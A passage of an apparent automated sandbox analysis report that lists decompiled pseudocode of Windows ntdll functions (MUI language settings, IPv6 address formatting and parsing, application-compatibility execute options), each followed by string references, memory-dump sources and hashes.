                                                								E00A4E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
                                                								_v52 = _v52 & 0x00000000;
                                                								_v32 = _v32 & 0x00000000;
                                                							}
                                                							if(_v8 != 0) {
                                                								E00A4E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                							}
                                                							_v8 = _v8 & 0x00000000;
                                                							_t318 = 0;
                                                							goto L46;
                                                						}
                                                					}
                                                					_t257 = _v24;
                                                					_t322 = _t257 + 4;
                                                					_push(_t257);
                                                					_v40 = _t322;
                                                					E00A6718A(_t257);
                                                					_t338 = _t335 + 4;
                                                					if(_t322 == _t318) {
                                                						_v20 = _t318;
                                                					} else {
                                                						_v20 = E00A4E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                					}
                                                					if(_v20 == _t318) {
                                                						_v40 = _t318;
                                                						goto L58;
                                                					} else {
                                                						E00A42340(_v20, _v8, _v24);
                                                						_v16 = _v20;
                                                						_a4 = _t318;
                                                						_t261 = E00A5E679(_v20, _t332);
                                                						_t335 = _t338 + 0x14;
                                                						while(1) {
                                                							_v12 = _t261;
                                                							if(_t261 == _t318) {
                                                								break;
                                                							}
                                                							_v12 = _v12 + 2;
                                                							 *_v12 = 0;
                                                							E00A4E2A8(_v12,  &_v68, _v16);
                                                							if(E00A65553(_t328,  &_v68,  &_v36) != 0) {
                                                								_a4 = _a4 + 1;
                                                							}
                                                							_v16 = _v12;
                                                							_t261 = E00A5E679(_v12, _t332);
                                                							_pop(_t322);
                                                						}
                                                						_t269 = _v16;
                                                						if( *_v16 != _t318) {
                                                							E00A4E2A8(_t322,  &_v68, _t269);
                                                							if(E00A65553(_t328,  &_v68,  &_v36) != 0) {
                                                								_a4 = _a4 + 1;
                                                							}
                                                						}
                                                						if(_a4 == _t318) {
                                                							E00A4E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                							_v40 = _t318;
                                                							_v20 = _t318;
                                                						}
                                                						if(_v8 != _t318) {
                                                							E00A4E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                						}
                                                						_v8 = _t318;
                                                						goto L30;
                                                					}
                                                				}
                                                				_t284 = _v24;
                                                				_t322 = _t284 + 4;
                                                				_push(_t284);
                                                				_v48 = _t322;
                                                				E00A6718A(_t284);
                                                				_t339 = _t335 + 4;
                                                				if(_t322 == _t318) {
                                                					_v28 = _t318;
                                                				} else {
                                                					_v28 = E00A4E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                				}
                                                				if(_v28 == _t318) {
                                                					_v48 = _t318;
                                                					goto L58;
                                                				} else {
                                                					E00A42340(_v28, _v8, _v24);
                                                					_v16 = _v28;
                                                					_a4 = _t318;
                                                					_t288 = E00A5E679(_v28, _t332);
                                                					_t335 = _t339 + 0x14;
                                                					while(1) {
                                                						_v12 = _t288;
                                                						if(_t288 == _t318) {
                                                							break;
                                                						}
                                                						_v12 = _v12 + 2;
                                                						 *_v12 = 0;
                                                						E00A4E2A8(_v12,  &_v68, _v16);
                                                						if(E00A65553(_t328,  &_v68,  &_v36) != 0) {
                                                							_a4 = _a4 + 1;
                                                						}
                                                						_v16 = _v12;
                                                						_t288 = E00A5E679(_v12, _t332);
                                                						_pop(_t322);
                                                					}
                                                					_t296 = _v16;
                                                					if( *_v16 != _t318) {
                                                						E00A4E2A8(_t322,  &_v68, _t296);
                                                						if(E00A65553(_t328,  &_v68,  &_v36) != 0) {
                                                							_a4 = _a4 + 1;
                                                						}
                                                					}
                                                					if(_a4 == _t318) {
                                                						E00A4E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
                                                						_v48 = _t318;
                                                						_v28 = _t318;
                                                					}
                                                					if(_v8 != _t318) {
                                                						E00A4E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                					}
                                                					_v8 = _t318;
                                                					goto L17;
                                                				}
                                                			}

                                                APIs
                                                Strings
                                                • Kernel-MUI-Language-Allowed, xrefs: 00A68827
                                                • Kernel-MUI-Language-Disallowed, xrefs: 00A68914
                                                • WindowsExcludedProcs, xrefs: 00A687C1
                                                • Kernel-MUI-Number-Allowed, xrefs: 00A687E6
                                                • Kernel-MUI-Language-SKU, xrefs: 00A689FC
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520442936.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                • Associated: 00000007.00000002.520433882.0000000000A20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520510396.0000000000B10000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520516492.0000000000B20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520522243.0000000000B24000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520527371.0000000000B27000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520532501.0000000000B30000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520559186.0000000000B90000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: _wcspbrk
                                                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                • API String ID: 402402107-258546922
                                                • Opcode ID: 208b22777f0f102398881cc315b81a742f43ec2479715bf5b2b875e574178b3b
                                                • Instruction ID: 5ab7665fc7cde54beed12ebbd0d115cb4ab6791bda4bcc5c262023b1d487ed70
                                                • Opcode Fuzzy Hash: 208b22777f0f102398881cc315b81a742f43ec2479715bf5b2b875e574178b3b
                                                • Instruction Fuzzy Hash: 11F1F5B6D00209EFCF11DFA4CA859EEBBB8FF08300F14456AE505A7211EB359E45DB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 38%
                                                			E00A813CB(intOrPtr* _a4, intOrPtr _a8) {
                                                				char _v8;
                                                				intOrPtr _v12;
                                                				intOrPtr* _v16;
                                                				intOrPtr _v20;
                                                				char _v24;
                                                				intOrPtr _t71;
                                                				signed int _t78;
                                                				signed int _t86;
                                                				char _t90;
                                                				signed int _t91;
                                                				signed int _t96;
                                                				intOrPtr _t108;
                                                				signed int _t114;
                                                				void* _t115;
                                                				intOrPtr _t128;
                                                				intOrPtr* _t129;
                                                				void* _t130;
                                                
                                                				_t129 = _a4;
                                                				_t128 = _a8;
                                                				_t116 = 0;
                                                				_t71 = _t128 + 0x5c;
                                                				_v8 = 8;
                                                				_v20 = _t71;
                                                				if( *_t129 == 0) {
                                                					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
                                                						goto L5;
                                                					} else {
                                                						_t96 =  *(_t129 + 8) & 0x0000ffff;
                                                						if(_t96 != 0) {
                                                							L38:
                                                							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
                                                								goto L5;
                                                							} else {
                                                								_push( *(_t129 + 0xf) & 0x000000ff);
                                                								_push( *(_t129 + 0xe) & 0x000000ff);
                                                								_push( *(_t129 + 0xd) & 0x000000ff);
                                                								_t86 = E00A77707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
                                                								L36:
                                                								return _t128 + _t86 * 2;
                                                							}
                                                						}
                                                						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
                                                						if(_t114 == 0) {
                                                							L33:
                                                							_t115 = 0xa42926;
                                                							L35:
                                                							_push( *(_t129 + 0xf) & 0x000000ff);
                                                							_push( *(_t129 + 0xe) & 0x000000ff);
                                                							_push( *(_t129 + 0xd) & 0x000000ff);
                                                							_push( *(_t129 + 0xc) & 0x000000ff);
                                                							_t86 = E00A77707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
                                                							goto L36;
                                                						}
                                                						if(_t114 != 0xffff) {
                                                							_t116 = 0;
                                                							goto L38;
                                                						}
                                                						if(_t114 != 0) {
                                                							_t115 = 0xa49cac;
                                                							goto L35;
                                                						}
                                                						goto L33;
                                                					}
                                                				} else {
                                                					L5:
                                                					_a8 = _t116;
                                                					_a4 = _t116;
                                                					_v12 = _t116;
                                                					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
                                                						if( *(_t129 + 0xa) == 0xfe5e) {
                                                							_v8 = 6;
                                                						}
                                                					}
                                                					_t90 = _v8;
                                                					if(_t90 <= _t116) {
                                                						L11:
                                                						if(_a8 - _a4 <= 1) {
                                                							_a8 = _t116;
                                                							_a4 = _t116;
                                                						}
                                                						_t91 = 0;
                                                						if(_v8 <= _t116) {
                                                							L22:
                                                							if(_v8 < 8) {
                                                								_push( *(_t129 + 0xf) & 0x000000ff);
                                                								_push( *(_t129 + 0xe) & 0x000000ff);
                                                								_push( *(_t129 + 0xd) & 0x000000ff);
                                                								_t128 = _t128 + E00A77707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
                                                							}
                                                							return _t128;
                                                						} else {
							L14:
                                                							if(_a4 > _t91 || _t91 >= _a8) {
                                                								if(_t91 != _t116 && _t91 != _a8) {
                                                									_push(":");
                                                									_push(_t71 - _t128 >> 1);
                                                									_push(_t128);
                                                									_t128 = _t128 + E00A77707() * 2;
                                                									_t71 = _v20;
                                                									_t130 = _t130 + 0xc;
                                                								}
                                                								_t78 = E00A77707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
                                                								_t130 = _t130 + 0x10;
                                                							} else {
                                                								_push(L"::");
                                                								_push(_t71 - _t128 >> 1);
                                                								_push(_t128);
                                                								_t78 = E00A77707();
                                                								_t130 = _t130 + 0xc;
                                                								_t91 = _a8 - 1;
                                                							}
                                                							_t91 = _t91 + 1;
                                                							_t128 = _t128 + _t78 * 2;
                                                							_t71 = _v20;
                                                							if(_t91 >= _v8) {
                                                								goto L22;
                                                							}
                                                							_t116 = 0;
                                                							goto L14;
                                                						}
                                                					} else {
                                                						_t108 = 1;
                                                						_v16 = _t129;
                                                						_v24 = _t90;
                                                						do {
                                                							if( *_v16 == _t116) {
                                                								if(_t108 - _v12 > _a8 - _a4) {
                                                									_a4 = _v12;
                                                									_a8 = _t108;
                                                								}
                                                								_t116 = 0;
                                                							} else {
                                                								_v12 = _t108;
                                                							}
                                                							_v16 = _v16 + 2;
                                                							_t108 = _t108 + 1;
                                                							_t26 =  &_v24;
                                                							 *_t26 = _v24 - 1;
                                                						} while ( *_t26 != 0);
                                                						goto L11;
                                                					}
                                                				}
                                                			}

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520442936.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                • Associated: 00000007.00000002.520433882.0000000000A20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520510396.0000000000B10000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520516492.0000000000B20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520522243.0000000000B24000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520527371.0000000000B27000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520532501.0000000000B30000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520559186.0000000000B90000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                • API String ID: 48624451-2108815105
                                                • Opcode ID: 7c777b6726091f49dd0a9d011c1821f310e2863bf4d13446bf67e184df0fd0cd
                                                • Instruction ID: 9bb5ff0cbf4bea62b3719ec61a768380f95b12e9dd7b2d19e37c31db67ad464c
                                                • Opcode Fuzzy Hash: 7c777b6726091f49dd0a9d011c1821f310e2863bf4d13446bf67e184df0fd0cd
                                                • Instruction Fuzzy Hash: 4A6127B5D00755AACB24EF59C8808BFBBB9EFD5300B54C52DF4DA4B581D334AA41CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 64%
                                                			E00A77EFD(void* __ecx, intOrPtr _a4) {
                                                				signed int _v8;
                                                				char _v540;
                                                				unsigned int _v544;
                                                				signed int _v548;
                                                				intOrPtr _v552;
                                                				char _v556;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t33;
                                                				void* _t38;
                                                				unsigned int _t46;
                                                				unsigned int _t47;
                                                				unsigned int _t52;
                                                				intOrPtr _t56;
                                                				unsigned int _t62;
                                                				void* _t69;
                                                				void* _t70;
                                                				intOrPtr _t72;
                                                				signed int _t73;
                                                				void* _t74;
                                                				void* _t75;
                                                				void* _t76;
                                                				void* _t77;
                                                
                                                				_t33 =  *0xb22088; // 0x77505ff5
                                                				_v8 = _t33 ^ _t73;
                                                				_v548 = _v548 & 0x00000000;
                                                				_t72 = _a4;
                                                				if(L00A77F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
                                                					__eflags = _v548;
                                                					if(_v548 == 0) {
                                                						goto L1;
                                                					}
                                                					_t62 = _t72 + 0x24;
                                                					E00A93F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
                                                					_t71 = 0x214;
                                                					_v544 = 0x214;
                                                					E00A4DFC0( &_v540, 0, 0x214);
                                                					_t75 = _t74 + 0x20;
                                                					_t46 =  *0xb24218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
                                                					__eflags = _t46;
                                                					if(_t46 == 0) {
                                                						goto L1;
                                                					}
                                                					_t47 = _v544;
                                                					__eflags = _t47;
                                                					if(_t47 == 0) {
                                                						goto L1;
                                                					}
                                                					__eflags = _t47 - 0x214;
                                                					if(_t47 >= 0x214) {
                                                						goto L1;
                                                					}
                                                					_push(_t62);
                                                					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
                                                					E00A93F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
                                                					_t52 = E00A50D27( &_v540, L"Execute=1");
                                                					_t76 = _t75 + 0x1c;
                                                					_push(_t62);
                                                					__eflags = _t52;
                                                					if(_t52 == 0) {
                                                						E00A93F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
                                                						_t71 =  &_v540;
                                                						_t56 = _t73 + _v544 - 0x218;
                                                						_t77 = _t76 + 0x14;
                                                						_v552 = _t56;
                                                						__eflags = _t71 - _t56;
                                                						if(_t71 >= _t56) {
                                                							goto L1;
                                                						} else {
                                                							goto L10;
                                                						}
                                                						while(1) {
                                                							L10:
                                                							_t62 = E00A58375(_t71, 0x20);
                                                							_pop(_t69);
                                                							__eflags = _t62;
                                                							if(__eflags != 0) {
                                                								__eflags = 0;
                                                								 *_t62 = 0;
                                                							}
                                                							E00A93F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
                                                							_t77 = _t77 + 0x10;
                                                							E00ABE8DB(_t69, _t70, __eflags, _t72, _t71);
                                                							__eflags = _t62;
                                                							if(_t62 == 0) {
                                                								goto L1;
                                                							}
                                                							_t31 = _t62 + 2; // 0x2
                                                							_t71 = _t31;
                                                							__eflags = _t71 - _v552;
                                                							if(_t71 >= _v552) {
                                                								goto L1;
                                                							}
                                                						}
                                                					}
                                                					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
                                                					_push(3);
                                                					_push(0x55);
                                                					E00A93F92();
                                                					_t38 = 1;
                                                					L2:
                                                					return E00A4E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
                                                				}
                                                				L1:
                                                				_t38 = 0;
                                                				goto L2;
                                                			}

                                                APIs
                                                • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00A93F12
                                                Strings
                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 00A9E345
                                                • ExecuteOptions, xrefs: 00A93F04
                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00A93F75
                                                • Execute=1, xrefs: 00A93F5E
                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00A93EC4
                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 00A9E2FB
                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00A93F4A
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520442936.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                • Associated: 00000007.00000002.520433882.0000000000A20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520510396.0000000000B10000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520516492.0000000000B20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520522243.0000000000B24000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520527371.0000000000B27000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520532501.0000000000B30000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520559186.0000000000B90000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: BaseDataModuleQuery
                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                • API String ID: 3901378454-484625025
                                                • Opcode ID: c582499941d2d6140386de3e8b297140bff1a7e0aeb818a64e5b1555834f4239
                                                • Instruction ID: 2a784f9344ce5951899d836ac6aa1627647f2453516e066c3cc4246061c2dc92
                                                • Opcode Fuzzy Hash: c582499941d2d6140386de3e8b297140bff1a7e0aeb818a64e5b1555834f4239
                                                • Instruction Fuzzy Hash: 2B41B672A8021CBADF24DB94DDC6FEE73FCAB55700F0045A9F509E6081EA709B45CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00A80B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
                                                				signed int _v8;
                                                				signed int _v12;
                                                				signed int _v16;
                                                				signed int _v20;
                                                				signed int _v24;
                                                				signed int _v28;
                                                				signed int _v32;
                                                				void* _t108;
                                                				void* _t116;
                                                				char _t120;
                                                				short _t121;
                                                				void* _t128;
                                                				intOrPtr* _t130;
                                                				char _t132;
                                                				short _t133;
                                                				intOrPtr _t141;
                                                				signed int _t156;
                                                				signed int _t174;
                                                				intOrPtr _t177;
                                                				intOrPtr* _t179;
                                                				intOrPtr _t180;
                                                				void* _t183;
                                                
                                                				_t179 = _a4;
                                                				_t141 =  *_t179;
                                                				_v16 = 0;
                                                				_v28 = 0;
                                                				_v8 = 0;
                                                				_v24 = 0;
                                                				_v12 = 0;
                                                				_v32 = 0;
                                                				_v20 = 0;
                                                				if(_t141 == 0) {
                                                					L41:
                                                					 *_a8 = _t179;
                                                					_t180 = _v24;
                                                					if(_t180 != 0) {
                                                						if(_t180 != 3) {
                                                							goto L6;
                                                						}
                                                						_v8 = _v8 + 1;
                                                					}
                                                					_t174 = _v32;
                                                					if(_t174 == 0) {
                                                						if(_v8 == 7) {
                                                							goto L43;
                                                						}
                                                						goto L6;
                                                					}
                                                					L43:
                                                					if(_v16 != 1) {
                                                						if(_v16 != 2) {
                                                							goto L6;
                                                						}
                                                						 *((short*)(_a12 + _v20 * 2)) = 0;
                                                						L47:
                                                						if(_t174 != 0) {
                                                							E00A58980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
                                                							_t116 = 8;
                                                							E00A4DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
                                                						}
                                                						return 0;
                                                					}
                                                					if(_t180 != 0) {
                                                						if(_v12 > 3) {
                                                							goto L6;
                                                						}
                                                						_t120 = E00A80CFA(_v28, 0, 0xa);
                                                						_t183 = _t183 + 0xc;
                                                						if(_t120 > 0xff) {
                                                							goto L6;
                                                						}
                                                						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
                                                						goto L47;
                                                					}
                                                					if(_v12 > 4) {
                                                						goto L6;
                                                					}
                                                					_t121 = E00A80CFA(_v28, _t180, 0x10);
                                                					_t183 = _t183 + 0xc;
                                                					 *((short*)(_a12 + _v20 * 2)) = _t121;
                                                					goto L47;
                                                				} else {
                                                					while(1) {
                                                						_t123 = _v16;
                                                						if(_t123 == 0) {
                                                							goto L7;
                                                						}
                                                						_t108 = _t123 - 1;
                                                						if(_t108 != 0) {
                                                							goto L1;
                                                						}
                                                						_t178 = _t141;
                                                						if(E00A806BA(_t108, _t141) == 0 || _t135 == 0) {
                                                							if(E00A806BA(_t135, _t178) == 0 || E00A80A5B(_t136, _t178) == 0) {
                                                								if(_t141 != 0x3a) {
                                                									if(_t141 == 0x2e) {
                                                										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
                                                											goto L41;
                                                										} else {
                                                											_v24 = _v24 + 1;
                                                											L27:
                                                											_v16 = _v16 & 0x00000000;
                                                											L28:
                                                											if(_v28 == 0) {
                                                												goto L20;
                                                											}
                                                											_t177 = _v24;
                                                											if(_t177 != 0) {
                                                												if(_v12 > 3) {
                                                													L6:
                                                													return 0xc000000d;
                                                												}
                                                												_t132 = E00A80CFA(_v28, 0, 0xa);
                                                												_t183 = _t183 + 0xc;
                                                												if(_t132 > 0xff) {
                                                													goto L6;
                                                												}
                                                												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
                                                												goto L20;
                                                											}
                                                											if(_v12 > 4) {
                                                												goto L6;
                                                											}
                                                											_t133 = E00A80CFA(_v28, 0, 0x10);
                                                											_t183 = _t183 + 0xc;
                                                											_v20 = _v20 + 1;
                                                											 *((short*)(_a12 + _v20 * 2)) = _t133;
                                                											goto L20;
                                                										}
                                                									}
                                                									goto L41;
                                                								}
                                                								if(_v24 > 0 || _v8 > 6) {
                                                									goto L41;
                                                								} else {
                                                									_t130 = _t179 + 1;
                                                									if( *_t130 == _t141) {
                                                										if(_v32 != 0) {
                                                											goto L41;
                                                										}
                                                										_v32 = _v8 + 1;
                                                										_t156 = 2;
                                                										_v8 = _v8 + _t156;
                                                										L34:
                                                										_t179 = _t130;
                                                										_v16 = _t156;
                                                										goto L28;
                                                									}
                                                									_v8 = _v8 + 1;
                                                									goto L27;
                                                								}
                                                							} else {
                                                								_v12 = _v12 + 1;
                                                								if(_v24 > 0) {
                                                									goto L41;
                                                								}
                                                								_a7 = 1;
                                                								goto L20;
                                                							}
                                                						} else {
                                                							_v12 = _v12 + 1;
                                                							L20:
                                                							_t179 = _t179 + 1;
                                                							_t141 =  *_t179;
                                                							if(_t141 == 0) {
                                                								goto L41;
                                                							}
                                                							continue;
                                                						}
                                                						L7:
                                                						if(_t141 == 0x3a) {
                                                							if(_v24 > 0 || _v8 > 0) {
                                                								goto L41;
                                                							} else {
                                                								_t130 = _t179 + 1;
                                                								if( *_t130 != _t141) {
                                                									goto L41;
                                                								}
                                                								_v20 = _v20 + 1;
                                                								_t156 = 2;
                                                								_v32 = 1;
                                                								_v8 = _t156;
                                                								 *((short*)(_a12 + _v20 * 2)) = 0;
                                                								goto L34;
                                                							}
                                                						}
                                                						L8:
                                                						if(_v8 > 7) {
                                                							goto L41;
                                                						}
                                                						_t142 = _t141;
                                                						if(E00A806BA(_t123, _t141) == 0 || _t124 == 0) {
                                                							if(E00A806BA(_t124, _t142) == 0 || E00A80A5B(_t125, _t142) == 0 || _v24 > 0) {
                                                								goto L41;
                                                							} else {
                                                								_t128 = 1;
                                                								_a7 = 1;
                                                								_v28 = _t179;
                                                								_v16 = 1;
                                                								_v12 = 1;
                                                								L39:
                                                								if(_v16 == _t128) {
                                                									goto L20;
                                                								}
                                                								goto L28;
                                                							}
                                                						} else {
                                                							_a7 = 0;
                                                							_v28 = _t179;
                                                							_v16 = 1;
                                                							_v12 = 1;
                                                							goto L20;
                                                						}
                                                					}
                                                				}
                                                				L1:
                                                				_t123 = _t108 == 1;
                                                				if(_t108 == 1) {
                                                					goto L8;
                                                				}
                                                				_t128 = 1;
                                                				goto L39;
                                                			}


                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520442936.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                • Associated: 00000007.00000002.520433882.0000000000A20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520510396.0000000000B10000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520516492.0000000000B20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520522243.0000000000B24000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520527371.0000000000B27000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520532501.0000000000B30000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520559186.0000000000B90000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: __fassign
                                                • String ID: .$:$:
                                                • API String ID: 3965848254-2308638275
                                                • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                • Instruction ID: da0f3e67c07245a554817993a2fb5555378db85534ef3135e967e148c5833d03
                                                • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                • Instruction Fuzzy Hash: 7DA1B1B1D0030ADFDFA8EF64C845EBEB7B4BF05305F24856AD852A7281D7349A49CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AA2206
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520442936.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                • Associated: 00000007.00000002.520433882.0000000000A20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520510396.0000000000B10000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520516492.0000000000B20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520522243.0000000000B24000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520527371.0000000000B27000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520532501.0000000000B30000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520559186.0000000000B90000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 885266447-4236105082
                                                • Opcode ID: 908223327254f09830818ec8ae3f7d4d877e2b0970df773f599098c952fda512
                                                • Instruction ID: 7662a3023d0ac1f1c6d74e8822ec220e7cd4a0393b1a915961b4bed8a8587431
                                                • Opcode Fuzzy Hash: 908223327254f09830818ec8ae3f7d4d877e2b0970df773f599098c952fda512
                                                • Instruction Fuzzy Hash: 52513935B002116FEF199B18CC81FA673A9AFD9710F218229FD55DF2C6DA31EC5587A0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___swprintf_l.LIBCMT ref: 00AAEA22
                                                  • Part of subcall function 00A813CB: ___swprintf_l.LIBCMT ref: 00A8146B
                                                  • Part of subcall function 00A813CB: ___swprintf_l.LIBCMT ref: 00A81490
                                                • ___swprintf_l.LIBCMT ref: 00A8156D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520442936.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                • Associated: 00000007.00000002.520433882.0000000000A20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520510396.0000000000B10000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520516492.0000000000B20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520522243.0000000000B24000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520527371.0000000000B27000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520532501.0000000000B30000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520559186.0000000000B90000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: %%%u$]:%u
                                                • API String ID: 48624451-3050659472
                                                • Opcode ID: 7d3d601b5c065af6819efa8aa9111b20fa3f77d37546ed2a927dd24314fe86d1
                                                • Instruction ID: 8eebf5763d3f5fbfe0faef7f2a56e820e9104b416245083c7acf16ea107c958d
                                                • Opcode Fuzzy Hash: 7d3d601b5c065af6819efa8aa9111b20fa3f77d37546ed2a927dd24314fe86d1
